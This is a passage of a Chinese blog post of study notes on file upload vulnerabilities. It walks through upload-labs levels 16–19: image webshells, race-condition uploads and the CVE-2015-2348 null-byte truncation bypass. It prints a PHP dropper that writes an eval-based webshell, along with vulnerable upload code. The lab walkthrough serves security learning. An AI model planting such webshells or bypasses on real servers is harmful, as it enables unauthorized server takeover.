<h5 id="Pass-16"><a href="#Pass-16" class="headerlink" title="Pass-16"></a>Pass-16</h5><p>依旧是上传图片马，上传、查看文件名(正常情况下是用代理工具(如：BurpSuite)查看文件名)<br><img src="http://img-blog.csdnimg.cn/20190802234603734.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzNjI1OTE3,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br>测试连接、连接成功。利用的话，结合文件包含漏洞。<br>不过查看源码发现，综合判断了后缀名、content-type，以及利用imagecreatefromgif判断是否为gif图片，最后再做了一次二次渲染，绕过方法(不想尝试，这里借用大佬的一张图)：<br><img src="http://img-blog.csdnimg.cn/20190802235710965.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzNjI1OTE3,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
<h4 id="六、竞争条件攻击"><a href="#六、竞争条件攻击" class="headerlink" title="六、竞争条件攻击"></a>六、竞争条件攻击</h4><p><strong>竞争条件攻击存在的原因：</strong><br>一些网站上传逻辑是先允许上传任意文件，然后检查上传文件是否包含WebShell脚本，如果包含则删除该文件。文件上传成功后和删除文件之间存在短的时间差。攻击者可以利用这个时间差完成竞争条件的上传漏洞攻击。<br><strong>攻击过程：</strong><br>攻击者先上传一个webshell脚本<code>shell.php</code>，<code>shell.php</code>的内容是生成一个新的webshell脚本<code>webshell.php</code><br>shell.php代码如下：<br><figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">fputs(fopen(<span class="string">'../webshell.php'</span>,<span class="string">'w'</span>),<span class="string">'&lt;?php @eval($_POST['</span>a<span class="string">']);?&gt;'</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure></p>
<p><code>shell.php</code>上传成功后，客户端立即访问shell.php，则会在当前目录下自动生成<code>webshell.php</code>，这时攻击者就利用时间差完成webshell的上传。</p>
<h5 id="Pass-17"><a href="#Pass-17" class="headerlink" title="Pass-17"></a>Pass-17</h5><p>查看源码<br><figure class="highlight php"><table><tr><td class="code"><pre><span class="line">$is_upload = <span class="keyword">false</span>;</span><br><span class="line">$msg = <span class="keyword">null</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_POST[<span class="string">'submit'</span>]))&#123;</span><br><span class="line">    $ext_arr = <span class="keyword">array</span>(<span class="string">'jpg'</span>,<span class="string">'png'</span>,<span class="string">'gif'</span>);</span><br><span class="line">    $file_name = $_FILES[<span class="string">'upload_file'</span>][<span class="string">'name'</span>];</span><br><span class="line">    $temp_file = $_FILES[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line">    $file_ext = substr($file_name,strrpos($file_name,<span class="string">"."</span>)+<span class="number">1</span>);</span><br><span class="line">    $upload_file = UPLOAD_PATH . <span class="string">'/'</span> . $file_name;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span>(move_uploaded_file($temp_file, $upload_file))&#123;</span><br><span class="line">        <span class="keyword">if</span>(in_array($file_ext,$ext_arr))&#123;</span><br><span class="line">             $img_path = UPLOAD_PATH . <span class="string">'/'</span>. rand(<span class="number">10</span>, <span class="number">99</span>).date(<span class="string">"YmdHis"</span>).<span class="string">"."</span>.$file_ext;</span><br><span class="line">             rename($upload_file, $img_path);</span><br><span class="line">             $is_upload = <span class="keyword">true</span>;</span><br><span class="line">        &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">            $msg = <span class="string">"只允许上传.jpg|.png|.gif类型文件！"</span>;</span><br><span class="line">            unlink($upload_file);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        $msg = <span class="string">'上传出错！'</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>这里先将文件上传到服务器，然后通过rename修改名称，再通过unlink删除文件，因此可以通过条件竞争的方式在unlink之前，访问webshell。<br>首先在burp中不断发送上传webshell的数据包，然后不断在浏览器中访问，发现通过竞争可以访问到。<br>(不会不断发送上传webshell的数据包，没有复现成功)<br><a href="http://blog.csdn.net/weixin_40709439/article/details/82743951" target="_blank" rel="noopener">upload-labs17</a></p>
<h5 id="Pass-18"><a href="#Pass-18" class="headerlink" title="Pass-18"></a>Pass-18</h5><p>本关需要上传图片马，查看代码发现：<br>对文件后缀名做了白名单判断，然后会一步一步检查文件大小、文件是否存在等等，将文件上传后，对文件重新命名，同样存在条件竞争的漏洞。可以不断利用burp发送上传图片马的数据包，由于条件竞争，程序会出现来不及rename的问题，从而上传成功</p>
<p>依旧用<code>webshell.jpg</code>图片马测试，发送上传图片马的数据包<br><img src="http://img-blog.csdnimg.cn/20190803012725846.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzNjI1OTE3,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
<h4 id="CVE-2015-2348-move-uploaded-file-00截断"><a href="#CVE-2015-2348-move-uploaded-file-00截断" class="headerlink" title="CVE-2015-2348 move_uploaded_file() 00截断"></a>CVE-2015-2348 move_uploaded_file() 00截断</h4><h5 id="Pass-19"><a href="#Pass-19" class="headerlink" title="Pass-19"></a>Pass-19</h5><p>考察CVE-2015-2348 move_uploaded_file() 00截断，上传webshell，同时自定义保存名称，直接保存为php是不行的<br>查看源码，发现move_uploaded_file()函数中的img_path是由post参数save_name控制的，因此可以在save_name利用00截断绕过。上传的文件名用0x00绕过。改成*.php【二进制00】.1.jpg，上传文件名改成要自己定义。<br>也可以上传<code>webshell.php/.</code>绕过<br>下面用的windows的漏洞环境。两个文件名中间留一个空格<br><img src="http://img-blog.csdnimg.cn/20190803014926329.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzNjI1OTE3,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br>将0x20改为0x00<br><img src="http://img-blog.csdnimg.cn/20190803015051544.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzNjI1OTE3,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br>Forword发包，上传成功。<br><img src="http://img-blog.csdnimg.cn/20190803015147765.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzNjI1OTE3,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br>测试连接，连接成功<br><img src="http://img-blog.csdnimg.cn/20190803015511590.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzNjI1OTE3,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
<h3 id="感悟"><a href="#感悟" class="headerlink" title="感悟"></a>感悟</h3><p>好了，总结完毕，总算了解完文件上传漏洞的各种绕过姿势，收获很大。<br>继续努力，小白进阶ing。</p>

            <div class="post-copyright">
    <div class="content">
        <p>最后更新： 2019年10月19日 01:03</p>
        <p>原始链接： <a class="post-url" href="/2019/08/03/文件上传漏洞 学习笔记(二)/" title="文件上传漏洞 学习笔记(二)">https://qwzf.github.io/2019/08/03/文件上传漏洞 学习笔记(二)/</a></p>
        <footer>
            <a href="https://qwzf.github.io">
                <img src="/images/logo.png" alt="qwzf">
                qwzf
            </a>
        </footer>
    </div>
</div>

      
        
            
<div class="page-reward">
    <a id="rewardBtn" href="javascript:;">赏</a>
</div>

<div id="reward" class="post-modal reward-lay">
    <a class="close" href="javascript:;" id="reward-close">×</a>
    <span class="reward-title">
        <i class="icon icon-quote-left"></i>
        请我吃糖~
        <i class="icon icon-quote-right"></i>
    </span>
    <div class="reward-content">
        
        <div class="reward-code">
            <img id="rewardCode" src="/images/wechat_code.jpg" alt="打赏二维码">
        </div>
        <div class="reward-select">
            
            <label class="reward-select-item checked" data-id="wechat" data-wechat="/images/wechat_code.jpg">
                <img class="reward-select-item-wechat" src="/images/wechat.png" alt="微信">
            </label>
            
            
            <label class="reward-select-item" data-id="alipay" data-alipay="/images/alipay_code.jpg">
                <img class="reward-select-item-alipay" src="/images/alipay.png" alt="支付宝">
            </label>
            
        </div>
    </div>
</div>


        
    </div>
    <footer class="article-footer">
        
        
<div class="post-share">
    <a href="javascript:;" id="share-sub" class="post-share-fab">
        <i class="fa fa-share-alt"></i>
    </a>
    <div class="post-share-list" id="share-list">
        <ul class="share-icons">
          <li>
            <a class="weibo share-sns" target="_blank" href="http://service.weibo.com/share/share.php?url=https://qwzf.github.io/2019/08/03/文件上传漏洞 学习笔记(二)/&title=《文件上传漏洞 学习笔记(二)》 — qwzf&pic=http://img-blog.csdnimg.cn/20190803102801819.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzNjI1OTE3,size_16,color_FFFFFF,t_70" data-title="微博">
              <i class="fa fa-weibo"></i>
            </a>
          </li>
          <li>
            <a class="weixin share-sns" id="wxFab" href="javascript:;" data-title="微信">
              <i class="fa fa-weixin"></i>
            </a>
          </li>
          <li>
            <a class="qq share-sns" target="_blank" href="http://connect.qq.com/widget/shareqq/index.html?url=https://qwzf.github.io/2019/08/03/文件上传漏洞 学习笔记(二)/&title=《文件上传漏洞 学习笔记(二)》 — qwzf&source=" data-title="QQ">
              <i class="fa fa-qq"></i>
            </a>
          </li>
          <li>
            <a class="facebook share-sns" target="_blank" href="https://www.facebook.com/sharer/sharer.php?u=https://qwzf.github.io/2019/08/03/文件上传漏洞 学习笔记(二)/" data-title="Facebook">
              <i class="fa fa-facebook"></i>
            </a>
          </li>
          <li>
            <a class="twitter share-sns" target="_blank" href="https://twitter.com/intent/tweet?text=《文件上传漏洞 学习笔记(二)》 — qwzf&url=https://qwzf.github.io/2019/08/03/文件上传漏洞 学习笔记(二)/&via=https://qwzf.github.io" data-title="Twitter">
              <i class="fa fa-twitter"></i>
            </a>
          </li>
          <li>
            <a class="google share-sns" target="_blank" href="https://plus.google.com/share?url=https://qwzf.github.io/2019/08/03/文件上传漏洞 学习笔记(二)/" data-title="Google+">
              <i class="fa fa-google-plus"></i>
            </a>
          </li>
        </ul>
     </div>
</div>
<div class="post-modal wx-share" id="wxShare">
    <a class="close" href="javascript:;" id="wxShare-close">×</a>
    <p>扫一扫，分享到微信</p>
    <img src="//api.qrserver.com/v1/create-qr-code/?data=https://qwzf.github.io/2019/08/03/文件上传漏洞 学习笔记(二)/" alt="微信分享二维码">
</div>

<div class="mask"></div>

        
        <ul class="article-footer-menu">
            
            
  <li class="article-footer-tags">
    <i class="fa fa-tags"></i>
      
    <a href="/tags/BUG/" class="color4">BUG</a>
      
    <a href="/tags/文件上传漏洞/" class="color2">文件上传漏洞</a>
      
  </li>

        </ul>
        
    </footer>
  </div>
</article>


    <aside class="post-toc-pos post-toc-top" id="post-toc">
        <nav class="post-toc-wrap">
            <ol class="post-toc"><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#前言"><span class="post-toc-text">前言</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#正文"><span class="post-toc-text">正文</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-4"><a class="post-toc-link" href="#四、白名单限制文件上传"><span class="post-toc-text">四、白名单限制文件上传</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-5"><a class="post-toc-link" href="#文件截断绕过"><span class="post-toc-text">文件截断绕过</span></a></li><li class="post-toc-item post-toc-level-5"><a class="post-toc-link" href="#Pass-11"><span class="post-toc-text">Pass-11</span></a></li><li class="post-toc-item post-toc-level-5"><a class="post-toc-link" href="#Pass-12"><span class="post-toc-text">Pass-12</span></a></li></ol></li><li class="post-toc-item post-toc-level-4"><a class="post-toc-link" href="#五、内容限制文件上传"><span class="post-toc-text">五、内容限制文件上传</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-5"><a class="post-toc-link" href="#Pass-13"><span class="post-toc-text">Pass-13</span></a></li><li class="post-toc-item post-toc-level-5"><a class="post-toc-link" href="#图片马制作方法"><span class="post-toc-text">图片马制作方法</span></a></li><li class="post-toc-item post-toc-level-5"><a class="post-toc-link" href="#Pass-14"><span class="post-toc-text">Pass-14</span></a></li><li class="post-toc-item post-toc-level-5"><a class="post-toc-link" href="#Pass-15"><span class="post-toc-text">Pass-15</span></a></li><li class="post-toc-item post-toc-level-5"><a class="post-toc-link" href="#Pass-16"><span class="post-toc-text">Pass-16</span></a></li></ol></li><li class="post-toc-item post-toc-level-4"><a class="post-toc-link" href="#六、竞争条件攻击"><span class="post-toc-text">六、竞争条件攻击</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-5"><a class="post-toc-link" href="#Pass-17"><span class="post-toc-text">Pass-17</span></a></li><li class="post-toc-item post-toc-level-5"><a class="post-toc-link" href="#Pass-18"><span class="post-toc-text">Pass-18</span></a></li></ol></li><li class="post-toc-item post-toc-level-4"><a class="post-toc-link" href="#CVE-2015-2348-move-uploaded-file-00截断"><span class="post-toc-text">CVE-2015-2348 move_uploaded_file() 00截断</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-5"><a class="post-toc-link" href="#Pass-19"><span class="post-toc-text">Pass-19</span></a></li></ol></li></ol></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#感悟"><span class="post-toc-text">感悟</span></a></li></ol>
        </nav>
    </aside>
    

<nav id="article-nav">
  
    <a href="/2019/08/06/Crypto-RSA加密/" id="article-nav-newer" class="article-nav-link-wrap">

      <span class="article-nav-title">
        <i class="fa fa-hand-o-left" aria-hidden="true"></i>
        
          Crypto-RSA加密
        
      </span>
    </a>
  
  
    <a href="/2019/08/02/CTF做题总结(二)/" id="article-nav-older" class="article-nav-link-wrap">
      <span class="article-nav-title">CTF做题总结(二)</span>
      <i class="fa fa-hand-o-right" aria-hidden="true"></i>
    </a>
  
</nav>



    
        <div id="SOHUCS" sid="文件上传漏洞 学习笔记(二)"></div>
<script type="text/javascript">
    (function(){
        var appid = 'cyu8vHoCR';
        var conf = '6a556a19bef978fd5dcedcc4043f593b';
        var width = window.innerWidth || document.documentElement.clientWidth;
        if (width < 960) {
            window.document.write('<script id="changyan_mobile_js" charset="utf-8" type="text/javascript" src="https://changyan.sohu.com/upload/mobile/wap-js/changyan_mobile.js?client_id=' + appid + '&conf=' + conf + '"><\/script>'); } else { var loadJs=function(d,a){var c=document.getElementsByTagName("head")[0]||document.head||document.documentElement;var b=document.createElement("script");b.setAttribute("type","text/javascript");b.setAttribute("charset","UTF-8");b.setAttribute("src",d);if(typeof a==="function"){if(window.attachEvent){b.onreadystatechange=function(){var e=b.readyState;if(e==="loaded"||e==="complete"){b.onreadystatechange=null;a()}}}else{b.onload=a}}c.appendChild(b)};loadJs("https://changyan.sohu.com/upload/changyan.js",function(){window.changyan.api.config({appid:appid,conf:conf})}); } })(); </script>
<style>
#feedAv {
	position: absolute ! important;
	height: 0px;
	transform: scale(0) !important;
}
#pop_ad {
	transform: scale(0) !important;
	display: none !important;
}
</style>
    
</section>
        
      </div>
      <footer id="footer">
  <div class="outer">
    <div id="footer-info" class="inner">
      
<p>
    <span id="busuanzi_container_site_uv" style="display:none">
        总访客数：<span id="busuanzi_value_site_uv"></span>
    </span>
    <span id="busuanzi_container_site_pv" style="display:none">
        总访问量：<span id="busuanzi_value_site_pv"></span>
    </span>
</p>


      <p>
        <a href="https://qwzf.github.io/" target="_blank">Q子枫</a>
        <a href="https://blog.csdn.net/qq_43625917" target="_blank">我的CSDN</a>
      &copy; 2019 qwzf<br>
      </p>
    </div>
  </div>
</footer>
    <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
<script src="//cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
<script>
  var mihoConfig = {
      root: "https://qwzf.github.io",
      animate: true,
      isHome: false,
      share: true,
      reward: 1
  }
</script>
<div class="sidebar">
    <div id="sidebar-search" title="Search">
        <i class="fa fa-search"></i>
    </div>
    <div id="sidebar-category" title="Categories">
        <i class="fa fa-book"></i>
    </div>
    <div id="sidebar-tag" title="Tags">
        <i class="fa fa-tags"></i>
    </div>
    <div id="sidebar-top">
        <span class="sidebar-top-icon"><i class="fa fa-angle-up"></i></span>
    </div>
</div>
<div class="sidebar-menu-box" id="sidebar-menu-box">
    <div class="sidebar-menu-box-container">
        <div id="sidebar-menu-box-categories">
            <a class="category-link" href="/categories/CTF/">CTF</a><a class="category-link" href="/categories/Databases/">Databases</a><a class="category-link" href="/categories/First/">First</a><a class="category-link" href="/categories/HTTP/">HTTP</a><a class="category-link" href="/categories/Web/">Web</a>
        </div>
        <div id="sidebar-menu-box-tags">
            <a href="/tags/AWD/" style="font-size: 10px;">AWD</a> <a href="/tags/BUG/" style="font-size: 20px;">BUG</a> <a href="/tags/BUGKU/" style="font-size: 10px;">BUGKU</a> <a href="/tags/CSS/" style="font-size: 10px;">CSS</a> <a href="/tags/CTF/" style="font-size: 18.75px;">CTF</a> <a href="/tags/Crypto/" style="font-size: 13.75px;">Crypto</a> <a href="/tags/Databases/" style="font-size: 10px;">Databases</a> <a href="/tags/GET型双查询注入/" style="font-size: 10px;">GET型双查询注入</a> <a href="/tags/GET型盲注/" style="font-size: 10px;">GET型盲注</a> <a href="/tags/GET型错误型注入/" style="font-size: 10px;">GET型错误型注入</a> <a href="/tags/Github/" style="font-size: 10px;">Github</a> <a href="/tags/HTML/" style="font-size: 10px;">HTML</a> <a href="/tags/HTTP/" style="font-size: 11.25px;">HTTP</a> <a href="/tags/Hexo/" style="font-size: 10px;">Hexo</a> <a href="/tags/ISCC/" style="font-size: 11.25px;">ISCC</a> <a href="/tags/MISC/" style="font-size: 16.25px;">MISC</a> <a href="/tags/MySQL/" style="font-size: 12.5px;">MySQL</a> <a href="/tags/PHP/" style="font-size: 15px;">PHP</a> <a href="/tags/POST型报错注入/" style="font-size: 10px;">POST型报错注入</a> <a href="/tags/POST型盲注/" style="font-size: 10px;">POST型盲注</a> <a href="/tags/POST型联合查询注入/" style="font-size: 10px;">POST型联合查询注入</a> <a href="/tags/RSA/" style="font-size: 10px;">RSA</a> <a href="/tags/Reverse/" style="font-size: 10px;">Reverse</a> <a href="/tags/SQL/" style="font-size: 16.25px;">SQL</a> <a href="/tags/SQL注入/" style="font-size: 10px;">SQL注入</a> <a href="/tags/Web/" style="font-size: 17.5px;">Web</a> <a href="/tags/XSS/" style="font-size: 11.25px;">XSS</a> <a href="/tags/ZIP/" style="font-size: 10px;">ZIP</a> <a href="/tags/css/" style="font-size: 10px;">css</a> <a href="/tags/html/" style="font-size: 10px;">html</a> <a href="/tags/i春秋/" style="font-size: 10px;">i春秋</a> <a href="/tags/order-by排序注入/" style="font-size: 10px;">order by排序注入</a> <a href="/tags/php/" style="font-size: 10px;">php</a> <a href="/tags/phpstudy/" style="font-size: 10px;">phpstudy</a> <a href="/tags/二次注入/" style="font-size: 10px;">二次注入</a> <a href="/tags/任意文件读取与下载漏洞/" style="font-size: 10px;">任意文件读取与下载漏洞</a> <a href="/tags/前端/" style="font-size: 12.5px;">前端</a> <a href="/tags/协议层/" style="font-size: 10px;">协议层</a> <a href="/tags/南邮/" style="font-size: 11.25px;">南邮</a> <a href="/tags/反序列化漏洞/" style="font-size: 10px;">反序列化漏洞</a> <a href="/tags/命令执行与代码执行/" style="font-size: 10px;">命令执行与代码执行</a> <a href="/tags/堆叠注入/" style="font-size: 10px;">堆叠注入</a> <a href="/tags/安恒/" style="font-size: 10px;">安恒</a> <a href="/tags/宽字节注入/" style="font-size: 10px;">宽字节注入</a> <a href="/tags/导出文件注入/" style="font-size: 10px;">导出文件注入</a> <a href="/tags/开发/" style="font-size: 13.75px;">开发</a> <a href="/tags/抓包/" style="font-size: 10px;">抓包</a> <a href="/tags/攻防世界/" style="font-size: 11.25px;">攻防世界</a> <a href="/tags/数据库/" style="font-size: 10px;">数据库</a> <a href="/tags/文件上传漏洞/" style="font-size: 11.25px;">文件上传漏洞</a> <a href="/tags/文件包含漏洞/" style="font-size: 10px;">文件包含漏洞</a> <a href="/tags/源码泄露/" style="font-size: 10px;">源码泄露</a> <a href="/tags/盲注/" style="font-size: 10px;">盲注</a> <a href="/tags/移位编码/" style="font-size: 10px;">移位编码</a> <a href="/tags/简单加密/" style="font-size: 10px;">简单加密</a> <a href="/tags/线下/" style="font-size: 10px;">线下</a> <a href="/tags/过滤敏感关键字与WAF绕过/" style="font-size: 10px;">过滤敏感关键字与WAF绕过</a> <a href="/tags/隐写/" style="font-size: 11.25px;">隐写</a>
        </div>
    </div>
    <a href="javascript:;" class="sidebar-menu-box-close">&times;</a>
</div>
<div class="mobile-header-menu-nav" id="mobile-header-menu-nav">
    <div class="mobile-header-menu-container">
        <span class="title">Menus</span>
        <ul class="mobile-header-menu-navbar">
            
            <li>
                <a href="/">
                    <i class="fa fa-home"></i><span>Home</span>
                </a>
            </li>
            
            <li>
                <a target="_blank" href="/archives">
                    <i class="fa fa-archive"></i><span>Archives</span>
                </a>
            </li>
            
            <li>
                <a href="/about">
                    <i class="fa fa-user"></i><span>About</span>
                </a>
            </li>
            
        </ul>
    </div>
    <div class="mobile-header-tag-container">
        <span class="title">Tags</span>
        <div id="mobile-header-container-tags">
            <a href="/tags/AWD/" style="font-size: 10px;">AWD</a> <a href="/tags/BUG/" style="font-size: 20px;">BUG</a> <a href="/tags/BUGKU/" style="font-size: 10px;">BUGKU</a> <a href="/tags/CSS/" style="font-size: 10px;">CSS</a> <a href="/tags/CTF/" style="font-size: 18.75px;">CTF</a> <a href="/tags/Crypto/" style="font-size: 13.75px;">Crypto</a> <a href="/tags/Databases/" style="font-size: 10px;">Databases</a> <a href="/tags/GET型双查询注入/" style="font-size: 10px;">GET型双查询注入</a> <a href="/tags/GET型盲注/" style="font-size: 10px;">GET型盲注</a> <a href="/tags/GET型错误型注入/" style="font-size: 10px;">GET型错误型注入</a> <a href="/tags/Github/" style="font-size: 10px;">Github</a> <a href="/tags/HTML/" style="font-size: 10px;">HTML</a> <a href="/tags/HTTP/" style="font-size: 11.25px;">HTTP</a> <a href="/tags/Hexo/" style="font-size: 10px;">Hexo</a> <a href="/tags/ISCC/" style="font-size: 11.25px;">ISCC</a> <a href="/tags/MISC/" style="font-size: 16.25px;">MISC</a> <a href="/tags/MySQL/" style="font-size: 12.5px;">MySQL</a> <a href="/tags/PHP/" style="font-size: 15px;">PHP</a> <a href="/tags/POST型报错注入/" style="font-size: 10px;">POST型报错注入</a> <a href="/tags/POST型盲注/" style="font-size: 10px;">POST型盲注</a> <a href="/tags/POST型联合查询注入/" style="font-size: 10px;">POST型联合查询注入</a> <a href="/tags/RSA/" style="font-size: 10px;">RSA</a> <a href="/tags/Reverse/" style="font-size: 10px;">Reverse</a> <a href="/tags/SQL/" style="font-size: 16.25px;">SQL</a> <a href="/tags/SQL注入/" style="font-size: 10px;">SQL注入</a> <a href="/tags/Web/" style="font-size: 17.5px;">Web</a> <a href="/tags/XSS/" style="font-size: 11.25px;">XSS</a> <a href="/tags/ZIP/" style="font-size: 10px;">ZIP</a> <a href="/tags/css/" style="font-size: 10px;">css</a> <a href="/tags/html/" style="font-size: 10px;">html</a> <a href="/tags/i春秋/" style="font-size: 10px;">i春秋</a> <a href="/tags/order-by排序注入/" style="font-size: 10px;">order by排序注入</a> <a href="/tags/php/" style="font-size: 10px;">php</a> <a href="/tags/phpstudy/" style="font-size: 10px;">phpstudy</a> <a href="/tags/二次注入/" style="font-size: 10px;">二次注入</a> <a href="/tags/任意文件读取与下载漏洞/" style="font-size: 10px;">任意文件读取与下载漏洞</a> <a href="/tags/前端/" style="font-size: 12.5px;">前端</a> <a href="/tags/协议层/" style="font-size: 10px;">协议层</a> <a href="/tags/南邮/" style="font-size: 11.25px;">南邮</a> <a href="/tags/反序列化漏洞/" style="font-size: 10px;">反序列化漏洞</a> <a href="/tags/命令执行与代码执行/" style="font-size: 10px;">命令执行与代码执行</a> <a href="/tags/堆叠注入/" style="font-size: 10px;">堆叠注入</a> <a href="/tags/安恒/" style="font-size: 10px;">安恒</a> <a href="/tags/宽字节注入/" style="font-size: 10px;">宽字节注入</a> <a href="/tags/导出文件注入/" style="font-size: 10px;">导出文件注入</a> <a href="/tags/开发/" style="font-size: 13.75px;">开发</a> <a href="/tags/抓包/" style="font-size: 10px;">抓包</a> <a href="/tags/攻防世界/" style="font-size: 11.25px;">攻防世界</a> <a href="/tags/数据库/" style="font-size: 10px;">数据库</a> <a href="/tags/文件上传漏洞/" style="font-size: 11.25px;">文件上传漏洞</a> <a href="/tags/文件包含漏洞/" style="font-size: 10px;">文件包含漏洞</a> <a href="/tags/源码泄露/" style="font-size: 10px;">源码泄露</a> <a href="/tags/盲注/" style="font-size: 10px;">盲注</a> <a href="/tags/移位编码/" style="font-size: 10px;">移位编码</a> <a href="/tags/简单加密/" style="font-size: 10px;">简单加密</a> <a href="/tags/线下/" style="font-size: 10px;">线下</a> <a href="/tags/过滤敏感关键字与WAF绕过/" style="font-size: 10px;">过滤敏感关键字与WAF绕过</a> <a href="/tags/隐写/" style="font-size: 11.25px;">隐写</a>
        </div>
    </div>
</div>
<div class="search-wrap">
    <span class="search-close">&times;</span>
        <a href="javascript:;" class="header-icon waves-effect waves-circle waves-light" id="back">
            <i class="icon icon-lg icon-chevron-left"></i>
        </a>
        <input class="search-field" placeholder="Search..." id="keywords">
        <a id="search-submit" href="javascript:;">
            <i class="fa fa-search"></i>
        </a>
    <div class="search-container" id="search-container">
        <ul class="search-result" id="search-result">
        </ul>
    </div>
</div>

<div id="search-tpl">
    <li class="search-result-item">
        <a href="{url}" class="search-item-li">
            <span class="search-item-li-title" title="{title}">{title}</span>
        </a>
    </li>
</div>
<script src="/js/search.js"></script>
<script src="/js/main.js"></script>


  <script src="//cdn.bootcss.com/particles.js/2.0.0/particles.min.js"></script>
  <div id="particles"></div>
  <script src="/js/particles.js"></script>







  <link rel="stylesheet" href="//cdn.bootcss.com/animate.css/3.5.0/animate.min.css">
  <script src="//cdn.bootcss.com/scrollReveal.js/3.0.5/scrollreveal.js"></script>
  <script src="/js/animate.js"></script>


  <script src="/js/pop-img.js"></script>
  <script>
     $(".article-entry p img").popImg();
  </script>

<script type="text/javascript" src="/js/clicklove.js"></script>
  </div>
<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"debug":false,"model":{"jsonPath":"/live2dw/assets/haruto.model.json"},"display":{"position":"right","width":150,"height":300},"mobile":{"show":true},"log":false});</script></body>
</html>